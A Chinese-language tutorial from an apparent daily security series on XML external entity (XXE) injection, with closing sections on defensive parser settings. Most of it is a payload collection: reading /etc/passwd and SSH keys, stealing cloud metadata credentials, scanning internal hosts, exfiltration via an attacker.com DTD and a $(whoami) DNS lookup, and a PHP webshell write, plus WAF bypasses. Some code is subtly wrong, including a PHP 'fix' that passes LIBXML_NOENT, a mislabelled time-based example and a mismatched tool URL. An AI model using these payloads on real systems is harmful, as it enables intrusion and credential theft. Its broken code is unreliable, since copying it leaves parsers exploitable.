Day-046-XXE-XML 外部实体注入

# Day 44: XXE（XML 外部实体注入）

> Web 安全系列第 14 天 | 预计阅读时间：40 分钟 | 难度：★★★★☆

---

## 清单 目录

1. [XXE 概述](#xxe 概述)
2. [XML 基础回顾](#xml 基础回顾)
3. [XXE 原理详解](#xxe 原理详解)
4. [XXE 攻击类型](#xxe 攻击类型)
5. [文件读取利用](#文件读取利用)
6. [SSRF 利用](#ssrf 利用)
7. [RCE 利用](#rce 利用)
8. [Bypass 技术](#bypass 技术)
9. [检测与利用流程](#检测与利用流程)
10. [防护策略与最佳实践](#防护策略与最佳实践)
11. [总结与思考](#总结与思考)
12. [参考资料](#参考资料)

---

## XXE 概述

### 什么是 XXE

XXE（XML External Entity，XML 外部实体注入）是一种针对 XML 解析器的攻击技术，攻击者通过定义外部实体，让 XML 解析器读取任意文件或发起网络请求。

**形象理解**：
如果把 XML 解析器比作一个图书管理员，那么：
- **正常 XML** = 读者借阅图书馆内的书
- **XXE 攻击** = 读者让管理员去外面买书
- **管理员** = XML 解析器
- **后果** = 管理员真的去买了禁书（读取敏感文件或访问内网）

**XXE 的危害**：
```
1. 文件读取
   - 读取服务器文件
   - 读取配置文件
   - 读取源代码

2. SSRF（服务端请求伪造）
   - 访问内网服务
   - 扫描内网端口
   - 访问云元数据

3. 远程代码执行
   - 配合其他漏洞
   - 执行系统命令
   - 获取服务器权限

4. 拒绝服务
   - 实体扩展攻击
   - 资源耗尽
   - 服务不可用
```

**真实案例**：
```
案例 1: 某支付平台（2018）
- 漏洞：XXE
- 影响：服务器文件泄露
- 手法：XML 支付请求
- 后果：敏感配置泄露

案例 2: 某电商平台（2019）
- 漏洞：XXE + SSRF
- 影响：内网服务暴露
- 手法：商品导入功能
- 后果：内网数据库泄露

案例 3: 某 SaaS 服务（2020）
- 漏洞：XXE
- 影响：云凭证泄露
- 手法：文件上传功能
- 后果：云资源被控制
```

---

## XML 基础回顾

### XML 文档结构

**基本 XML**：
```xml
<?xml version="1.0" encoding="UTF-8"?>
<root>
  <element>value</element>
  <element attr="value">content</element>
</root>
```

**XML 声明**：
```xml
<?xml version="1.0"?>
<?xml version="1.0" encoding="UTF-8"?>
<?xml version="1.0" standalone="yes"?>
```

**XML 元素**：
```xml
<element>content</element>
<element attr="value">content</element>
<element/>  
```

### DTD（文档类型定义）

**内部 DTD**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ELEMENT root (element)>
  <!ELEMENT element (#PCDATA)>
  <!ATTLIST element attr CDATA #REQUIRED>
]>
<root>
  <element attr="value">content</element>
</root>
```

**外部 DTD**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root SYSTEM "http://attacker.com/malicious.dtd">
<root>
  <element>content</element>
</root>
```

### XML 实体

**普通实体**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY myentity "Hello World">
]>
<root>
  <element>&myentity;</element>
</root>

```

**参数实体**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % param "value">
  %param;
]>
<root>
  <element>content</element>
</root>
```

**外部实体**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///etc/passwd">
]>
<root>
  <element>&ext;</element>
</root>

```

---

## XXE 原理详解

### 为什么会发生 XXE

**根本原因**：
```
1. XML 解析器配置不当
   - 启用了外部实体
   - 未禁用 DTD
   - 未限制实体解析

2. 信任用户输入
   - 直接解析用户 XML
   - 未验证 XML 结构
   - 未过滤实体定义

3. 默认配置不安全
   - 许多解析器默认启用外部实体
   - 需要手动禁用
   - 开发人员 unaware
```

**漏洞代码示例**：
```php
<?php
// - 错误做法（PHP）
$xml = file_get_contents('php://input');
$doc = simplexml_load_string($xml);

// - 错误做法（Python）
from xml.etree import ElementTree
tree = ElementTree.parse(user_input)

// - 错误做法（Java）
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(user_input);
?>
```

### 攻击流程

```
步骤 1: 发现 XML 输入点
□ API 接口
□ 文件上传
□ Web Service
□ 文档解析
□ 数据导入

步骤 2: 测试 XXE
<!DOCTYPE root [<!ENTITY test "test">]>
<root>&test;</root>

步骤 3: 探测环境
- 解析器类型
- 实体支持
- 协议支持

步骤 4: 构造 Payload
- 文件读取
- SSRF
- RCE

步骤 5: 利用漏洞
- 读取敏感文件
- 访问内网服务
- 执行系统命令
```

---

## XXE 攻击类型

### 基于回显的 XXE

**原理**：
```
XML 解析器解析外部实体，
将结果返回到响应中。

适用场景：
- 解析结果在响应中显示
- 错误信息包含实体内容
- XML 数据被反射
```

**Payload 示例**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///etc/passwd">
]>
<root>
  <element>&ext;</element>
</root>
```

**响应**：
```xml
<root>
  <element>root:x:0:0:root:/root:/bin/bash
...</element>
</root>
```

### 盲 XXE

**原理**：
```
XML 解析器解析外部实体，
但结果不返回到响应中。

利用方法：
- 时间延迟
- DNS 外带
- HTTP 外带
- 错误信息
```

**时间盲注**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///etc/passwd">
]>
<root>
  <element>&ext;</element>
</root>

```

**DNS 外带**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://$(whoami).attacker.com/">
]>
<root>
  <element>test</element>
</root>

```

### 错误型 XXE

**原理**：
```
通过错误信息泄露数据。
解析器在解析外部实体时出错，
错误信息包含实体内容。
```

**Payload 示例**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///etc/passwd">
  <!ENTITY % param "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%ext;'>">
  %param;
  %error;
]>
<root>&ext;</root>
```

**错误响应**：
```
Error: Could not load file: /nonexistent/root:x:0:0:root:/root:/bin/bash...
```

---

## 文件读取利用

### 读取本地文件

**Linux 文件**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///etc/passwd">
]>
<root>
  <element>&ext;</element>
</root>
```

**敏感文件路径**：
```
/etc/passwd        → 用户列表
/etc/shadow        → 密码哈希（需要 root）
/proc/version      → 系统版本
/proc/self/environ → 环境变量
/root/.ssh/id_rsa  → SSH 私钥
/var/log/auth.log  → 认证日志
```

**Windows 文件**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///C:/Windows/win.ini">
]>
<root>
  <element>&ext;</element>
</root>
```

**敏感文件路径**：
```
C:\Windows\win.ini
C:\Windows\system32\drivers\etc\hosts
C:\Users\username\.ssh\id_rsa
C:\Program Files\...\config.xml
```

### 读取 PHP 源码

**PHP 伪协议**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "php://filter/convert.base64-encode/resource=/var/www/html/index.php">
]>
<root>
  <element>&ext;</element>
</root>
```

**响应（Base64 编码）**：
```
PD9waHAKZWNobyAiSGVsbG8gV29ybGQiOwo/Pg==
```

**解码后**：
```php
<?php
echo "Hello World";
?>
```

**其他伪协议**：
```
php://filter/convert.base64-encode/resource=file
php://filter/zlib.deflate/convert.base64-encode/resource=file
compress.zlib://file
compress.bzip2://file
```

### 读取 Java 类文件

**Java 类路径**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///var/www/html/WEB-INF/classes/com/example/User.class">
]>
<root>
  <element>&ext;</element>
</root>
```

**反编译类文件**：
```
使用 JD-GUI、CFR 等工具
反编译获取源代码
```

---

## SSRF 利用

### 内网扫描

**扫描内网端口**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://192.168.1.1:22/">
]>
<root>
  <element>&ext;</element>
</root>
```

**批量扫描**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext1 SYSTEM "http://192.168.1.1:22/">
  <!ENTITY ext2 SYSTEM "http://192.168.1.1:80/">
  <!ENTITY ext3 SYSTEM "http://192.168.1.1:443/">
  <!ENTITY ext4 SYSTEM "http://192.168.1.1:3306/">
]>
<root>
  <e1>&ext1;</e1>
  <e2>&ext2;</e2>
  <e3>&ext3;</e3>
  <e4>&ext4;</e4>
</root>
```

### 访问云元数据

**AWS 元数据**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<root>
  <element>&ext;</element>
</root>
```

**获取凭证**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name">
]>
<root>
  <element>&ext;</element>
</root>
```

**响应（AWS 凭证）**：
```json
{
  "Code": "Success",
  "AccessKeyId": "AKIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "AQoDYXdzEJr..."
}
```

**GCP 元数据**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token">
]>
<root>
  <element>&ext;</element>
</root>
```

**Azure 元数据**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://169.254.169.254/metadata/instance/compute?api-version=2017-08-01">
]>
<root>
  <element>&ext;</element>
</root>
```

### 访问内网服务

**访问内网 Web**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://192.168.1.100/admin/">
]>
<root>
  <element>&ext;</element>
</root>
```

**访问数据库**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://192.168.1.100:3306/">
]>
<root>
  <element>&ext;</element>
</root>
```

**访问 Redis**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://192.168.1.100:6379/">
]>
<root>
  <element>&ext;</element>
</root>
```

---

## RCE 利用

### PHP RCE

**expect 模块**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "expect://whoami">
]>
<root>
  <element>&ext;</element>
</root>
```

**要求**：
```
- PHP 安装了 expect 模块
- 通常默认不安装
- 需要编译安装
```

**安装 expect**：
```bash
pecl install expect
```

### Java RCE

**Java 反序列化**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "http://attacker.com/malicious.ser">
]>
<root>
  <element>&ext;</element>
</root>
```

**要求**：
```
- 应用反序列化 XML 中的对象
- 存在可利用的 Gadget 链
- 通常配合其他漏洞
```

### 其他 RCE

**配合文件写入**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "php://filter/write=string.rot13/resource=/var/www/html/shell.php">
]>
<root>
  <element>&ext;</element>
</root>
```

**写入内容（ROT13 编码）**：
```
&lt;?cuc flfgrz($_TRG[p]);?&gt;
```

**解码后**：
```php
<?php system($_GET['c']); ?>
```

---

## Bypass 技术

### WAF 绕过

**实体编码**：
```xml

<!ENTITY ext SYSTEM "&#x66;&#x69;&#x6c;&#x65;&#x3a;&#x2f;&#x2f;&#x2f;&#x65;&#x74;&#x63;&#x2f;&#x70;&#x61;&#x73;&#x73;&#x77;&#x64;">

<!ENTITY ext SYSTEM "&#102;&#105;&#108;&#101;&#58;&#47;&#47;&#47;&#101;&#116;&#99;&#47;&#112;&#97;&#115;&#115;&#119;&#100;">
```

**参数实体绕过**：
```xml
<!DOCTYPE root [
  <!ENTITY % param SYSTEM "http://attacker.com/malicious.dtd">
  %param;
]>
```

**malicious.dtd**：
```xml
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
```

### 过滤器绕过

**CDATA 绕过**：
```xml
<root>
  <![CDATA[<!DOCTYPE root [<!ENTITY test "test">]>]]>
</root>
```

**注释绕过**：
```xml
<root>
  
  <element>test</element>
</root>
```

**嵌套实体**：
```xml
<!DOCTYPE root [
  <!ENTITY a "file">
  <!ENTITY b ":///etc/passwd">
  <!ENTITY ext "&a;&b;">
]>
<root>
  <element>&ext;</element>
</root>
```

---

## 检测与利用流程

### 手工检测

**步骤 1: 寻找 XML 输入点**：
```
□ API 接口（Content-Type: application/xml）
□ 文件上传（XML 文件）
□ Web Service（SOAP）
□ 文档解析（Office、PDF）
□ 数据导入（XML 导入）
```

**步骤 2: 测试基础 Payload**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY test "test">]>
<root>&test;</root>

```

**步骤 3: 测试外部实体**：
```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY ext SYSTEM "file:///etc/passwd">
]>
<root>&ext;</root>

```

**步骤 4: 观察响应**：
```
- 文件内容 → 确认 XXE
- 错误信息 → 可能 XXE
- 时间延迟 → 可能盲 XXE
- 无变化 → 可能无 XXE
```

### 自动化工具

**XXEinjector**：
```bash
# 安装
git clone https://github.com/enjoiz/XXEinjector

# 使用
ruby XXEinjector.rb --host=attacker.com --file=request.txt --path=/etc/
```

**OXXE**：
```bash
# 安装
git clone https://github.com/TheTwitchy/xxeinjector

# 使用
python oxxe.py -u http://target.com/api -f request.xml
```

**Burp Suite**：
```
1. 拦截 XML 请求
2. 发送到 Repeater
3. 修改为 XXE Payload
4. 观察响应
```

### 利用流程

**信息收集**：
```xml

<!ENTITY ext SYSTEM "file:///etc/os-release">

<!ENTITY ext SYSTEM "file:///etc/passwd">

<!ENTITY ext SYSTEM "file:///etc/hosts">
```

**权限提升**：
```xml

<!ENTITY ext SYSTEM "file:///root/.ssh/id_rsa">

<!ENTITY ext SYSTEM "file:///var/www/html/config.php">

<!ENTITY ext SYSTEM "file:///var/log/auth.log">
```

**内网渗透**：
```xml

<!ENTITY ext SYSTEM "http://169.254.169.254/latest/meta-data/">

<!ENTITY ext SYSTEM "http://192.168.1.1:22/">

<!ENTITY ext SYSTEM "http://192.168.1.1:3306/">
```

---

## 防护策略与最佳实践

### 代码层面防护

**禁用外部实体**：
```php
// PHP - libxml
libxml_disable_entity_loader(true);
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT);

// PHP - DOMDocument
$doc = new DOMDocument();
$doc->loadXML($xml, LIBXML_NOENT | LIBXML_DTDLOAD | LIBXML_DTDATTR);
$doc->substituteEntities = false;
```

**Python**：
```python
# 使用 defusedxml
from defusedxml import ElementTree
tree = ElementTree.parse(user_input)

# 或使用 lxml 禁用实体
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(user_input, parser)
```

**Java**：
```java
// 禁用外部实体
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(user_input);
```

**.NET**：
```csharp
// 禁用外部实体
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(input, settings);
```

### 配置防护

**禁用 DTD**：
```
最安全的做法是完全禁用 DTD。

PHP:
libxml_disable_entity_loader(true);

Java:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

Python:
parser = etree.XMLParser(dtd_validation=False)
```

**白名单验证**：
```
只允许预期的 XML 结构。

验证：
- XML Schema
- DTD 白名单
- 自定义验证器
```

### 运行时防护

**WAF 规则**：
```
检测 XXE 特征：
- <!DOCTYPE
- <!ENTITY
- SYSTEM
- PUBLIC

阻断可疑请求：
- 包含实体定义
- 包含外部实体
- 来源可疑
```

**监控告警**：
```
监控：
- XML 解析调用
- 外部实体解析
- 文件访问
- 网络请求

告警：
- XXE 尝试
- 敏感文件访问
- 内网扫描
```

---

## 实战案例分析

### 案例 1: 支付平台 XXE

**漏洞描述**：
```
平台：某支付平台
漏洞：XXE
位置：支付请求 XML
影响：服务器文件泄露
```

**发现过程**：
```
1. 测试支付接口
   发送正常 XML 支付请求

2. 测试 XXE
   添加实体定义
   <!DOCTYPE root [<!ENTITY test "test">]>

3. 确认漏洞
   实体被解析
   返回实体内容

4. 利用漏洞
   读取配置文件
   获取数据库凭证
```

**Payload**：
```xml
<?xml version="1.0"?>
<!DOCTYPE payment [
  <!ENTITY ext SYSTEM "file:///var/www/html/config.php">
]>
<payment>
  <amount>100</amount>
  <config>&ext;</config>
</payment>
```

**修复方案**：
```
1. 禁用外部实体
   libxml_disable_entity_loader(true)

2. 验证 XML 结构
   使用 XML Schema

3. 过滤输入
   移除 DOCTYPE

4. 最小权限
   Web 用户不能读取敏感文件
```

### 案例 2: 文件导入 XXE

**漏洞描述**：
```
系统：某 ERP 系统
漏洞：XXE
位置：Excel 导入功能
影响：内网服务暴露
```

**攻击流程**：
```
1. Excel 文件包含 XXE
   制作恶意 Excel 文件

2. 上传文件
   通过导入功能上传

3. 解析触发
   系统解析 Excel 中的 XML

4. SSRF 利用
   访问内网服务
   获取敏感信息
```

**修复方案**：
```
1. 使用安全解析库
   defusedxml

2. 禁用外部实体
   配置解析器

3. 文件验证
   验证文件类型

4. 网络隔离
   应用服务器不能访问内网
```

---

## 总结与思考

### 核心要点回顾

1. **XXE 原理**
   - XML 解析器配置不当
   - 外部实体被解析
   - 读取文件或访问网络

2. **攻击类型**
   - 基于回显
   - 盲 XXE
   - 错误型

3. **防护策略**
   - 禁用外部实体
   - 禁用 DTD
   - 验证输入

### 深入思考问题

1. **为什么 XXE 依然普遍**？
   - 默认配置不安全
   - 开发人员 unaware
   - 第三方库问题

2. **云环境下的风险**？
   - 元数据服务
   - 内网服务
   - 新的攻击面

3. **未来防护方向**？
   - 安全默认配置
   - 解析器改进
   - 运行时保护

### 实战建议

**开发人员**：
1. 禁用外部实体
2. 使用安全库
3. 验证输入
4. 最小权限

**安全人员**：
1. 定期 XXE 扫描
2. 代码审计
3. 渗透测试
4. 监控告警

**管理层**：
1. 安全培训
2. 安全开发生命周期
3. 第三方组件管理
4. 应急响应预案

---

## 参考资料

### 学习资源
- [OWASP XXE](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing)
- [XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)

### 工具资源
- [XXEinjector](https://github.com/enjoiz/XXEinjector)
- [defusedxml](https://github.com/tiran/defusedxml)
- [Burp Suite](https://portswigger.net/burp)

### 书籍推荐
- 《Web 安全深度剖析》
- 《XML 安全编程》
- 《白帽子讲 Web 安全》

---

**标记 明日预告**：Day 45 - 反序列化漏洞进阶

> 本文内容仅供学习和研究使用，请勿用于非法目的。所有实验请在隔离环境中进行。

---

*本文是 365 天信息安全技术系列的第 44 篇，Web 安全部分第 14 篇，精编版本*